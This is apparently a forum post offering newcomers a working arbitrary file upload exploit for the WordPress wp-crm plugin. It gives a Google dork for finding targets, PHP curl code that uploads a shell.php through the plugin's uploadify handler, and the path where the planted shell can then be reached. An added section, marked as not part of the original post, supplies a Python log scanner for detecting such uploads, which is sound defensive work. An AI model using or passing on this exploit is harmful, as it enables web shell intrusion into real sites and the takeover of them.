I thought this time I'd share something for the newcomers too...
With this vulnerability you can upload a shell to the site...
============================================================================================================================================================================================================================
Full title WordPress wp-crm Plugin Arbitrary File Upload Vulnerability
Date add 2014-06-28
Category web applications
Platform php
Risk 80 percent
Affected ver All Version Affected
Tested on Linux
Google Dork : inurl:/wp-content/plugins/wp-crm/
Exploit :
Code:
<?php
$uploadfile="shell.php";
$ch = curl_init("http://localhost/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell path ====> http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)
Original: http://1337day.com/exploit/22388
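
The request pattern above as seen from the defender's side, as an added example that is not part of the original post: a Python check over web-server access logs that flags POSTs to a plugin's bundled uploadify.php and any other script later served from that directory. It generalizes from wp-crm to any plugin's third-party/uploadify/ directory; the combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re

# Combined-log-format prefix: ip, ident, user, [time], "METHOD PATH PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Any plugin's bundled third-party/uploadify/ directory (covers both paths in the post)
DIR_RE = re.compile(r"/wp-content/plugins/([^/]+)/third-party/uploadify/([^/]*)$")
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed list of executable types
HANDLER = "uploadify.php"

def scan(lines):
    """Return (upload_posts, script_hits) seen in access-log lines."""
    uploads, hits = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable request line
        ip, method, target, status = m.groups()
        d = DIR_RE.search(target.split("?", 1)[0].lower())
        if not d:
            continue
        plugin, name = d.groups()
        if name == HANDLER:
            if method == "POST":
                uploads.append((ip, plugin, status))
        elif name.endswith(SCRIPT_EXT) and status == "200":
            # A script other than the handler was served from the upload directory
            hits.append((ip, plugin, name))
    return uploads, hits

# Constructed sample lines (documentation IP ranges), not real traffic
SAMPLE = [
    '203.0.113.7 - - [28/Jun/2014:10:00:01 +0000] "POST /wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php HTTP/1.1" 200 12',
    '203.0.113.7 - - [28/Jun/2014:10:00:05 +0000] "GET /wordpress/wp-content/plugins/wp-crm/third-party/uploadify/x.php?a=1 HTTP/1.1" 200 431',
    '198.51.100.4 - - [28/Jun/2014:10:01:00 +0000] "GET /wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css HTTP/1.1" 200 900',
    '198.51.100.4 - - [28/Jun/2014:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    posts, served = scan(SAMPLE)
    for ip, plugin, status in posts:
        print(f"upload POST from {ip} to {plugin} handler (HTTP {status})")
    for ip, plugin, name in served:
        print(f"script {name} served from {plugin} uploadify dir to {ip}")
```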